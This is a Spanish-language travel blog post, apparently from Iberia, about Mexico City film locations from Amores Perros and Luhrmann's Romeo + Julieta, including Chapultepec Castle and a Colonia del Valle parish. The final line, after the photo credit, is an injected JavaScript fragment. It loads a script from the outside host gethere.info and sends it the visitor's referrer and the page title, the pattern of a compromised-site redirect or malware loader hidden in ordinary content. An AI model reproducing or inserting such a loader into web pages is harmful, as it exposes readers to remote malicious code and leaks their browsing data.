México, ciudad de grandes directores

29/11/2016

México de cineAsí se siente México, así se siente México,

Así como unos labios por la piel

Así te envuelve México, así te sabe México

Y así se lleva México en la piel

Al poner rumbo a América encontramos países en los que el invierno no es sinónimo de frío. Uno de ellos es México, ¿quieres que te ayudemos a organizar un viaje de película a ese flamante destino Iberia? ¡Acompáñanos!

Películas famosas rodadas en México

Al asociar México y el cine muchos pensamos en la película Amores Perros (2000), cuyo estreno coincidió con el cambio de siglo. Su entonces debutante director, Alejandro González Iñárritu, seguro no imaginaba que algún día recogería estatuillas doradas en grandes avenidas hollywoodienses. Lo que sí sabía era hacer buen cine y retratar con maestría el México al que queremos viajar. Es el caso de Amores Perros, cuya primera escena, la del choque entre coches, trasmite el frenesí de un destino que nos encanta.

La escena en cuestión se rodó en la Colonia Condesa, en el cruce entre las calles Juan Escutia y Atlixco. Si nos acercamos a curiosear, justo en la esquina encontraremos “El Pescadito”, lugar famoso por sus tacos de pescado (los de camarón son deleitosos), uno de los muchos restaurantes, cafés y bares de la zona, en la que abunda la oferta complementaria.

México te da sorpresas de cine. ¿Sabías que Romeo + Julieta de William Shakespeare –sí, sí, la de Leonardo DiCaprio y Claire Danes- fue rodada en Ciudad de México y alrededores? Viajemos cuatro años atrás en el tiempo (1996) de la mano de otro gran director: Baz Luhrmann.

El Sr. Luhrmann eligió México para representar Verona Beach, la mega urbe imaginaria de su película. De los tantos lugares de rodaje de Romeo + Julieta de William Shakespeare nos quedamos con dos, que son el Castillo de Chapultepec y la parroquia del Purísimo Corazón de María.

El majestuoso Castillo de Chapultepec, en el D.F., es en la película la casa de los Capuleto, la familia de Julieta, y es también donde se lleva a cabo el baile de mascaras donde ella y Romeo se conocen. Sin duda, estamos ante uno de los lugares de rodaje más emblemáticos de la cinta.

Conviene reservar unas horas para la visita al Castillo de Chapultepec, uno de los momentos más interesantes y abrumadores de todo viaje a México D.F., uno que supera las expectativas de cualquier turista. Envuelto en un parque inmenso, los alrededores son en sí un atractivo (para acceder al castillo se puede subir dando un agradable y verde paseo). Una vez arriba, las vistas desde el edificio y sus bellos jardines y terrazas son maravillosas, ¡toda una recompensa! Además, durante la visita se aprende mucho sobre el origen y el pasado de la ciudad, así como sobre la vida y obra de los gobernantes de México D.F.

La parroquia del Purísimo Corazón de María

Es emocionante saber que en esta parroquia se rodaron momentos tan esenciales de la película como la boda secreta o los suicidios de los protagonistas. Además, muchos recordaremos escenas como las tomas aéreas de la iglesia, cuando Romeo entra a ver al padre y cuando se esconde después de matar a Tibaldo, todas filmadas en la parroquia del Purísimo Corazón de María, ubicada en la calle Gabriel Mancera, en plena Colonia del Valle.

Más concretamente, el templo se halla en el Parque Mariscal Sucre, rincón de Colonia del Valle que merece una visita. La zona residencial, tranquila y segura, está considerada punto de referencia en la Ciudad de México. Abarca un gran número de parques, amplias y cuidadas calles, conocidos centros comerciales y algunos monumentos, en general atractivos turísticos de interés. Vale la pena acercarse al centro comercial de las Galerías Insurgentes para hacer compras, tanto diurnas como nocturnas.

Así se siente México, así se siente México,

Así como unos labios por la piel

Así te envuelve México, así te sabe México

Y así se lleva México en la piel

Foto: Gabriel Garcia Marengo

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;